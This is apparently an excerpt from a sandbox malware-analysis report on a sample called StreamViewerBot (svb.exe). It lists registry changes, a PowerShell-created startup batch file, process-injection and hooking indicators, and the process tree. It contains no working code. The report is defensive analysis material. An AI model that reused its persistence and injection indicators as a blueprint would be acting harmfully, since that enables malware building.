| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133614533598707878" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\3\0\0\NodeSlot = "8" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PCT = "133614529070489876" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\PTT = "133614532022682694" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI\microsoft.windows.immersivecontrolpanel\V1\LU\ICT = "133614532308453669" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "9" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\1\MRUListEx = ffffffff | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133596493963016225" | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\HAM\AUI | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133614532401578879" | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Desktop\New folder\vshz2ot2.newcfg\:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\StreamViewerBot-v24.03.15.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | C:\Users\Admin\Desktop\New folder\svb.exe\:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\StreamViewerBot.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\svb.exe | N/A |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://sourceforge.net/projects/streamviewerbot/files/latest/download
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffc018ab58,0x7fffc018ab68,0x7fffc018ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2104 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2960 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2968 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3392 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4312 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4580 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4624 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=3900 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2612 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2720 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
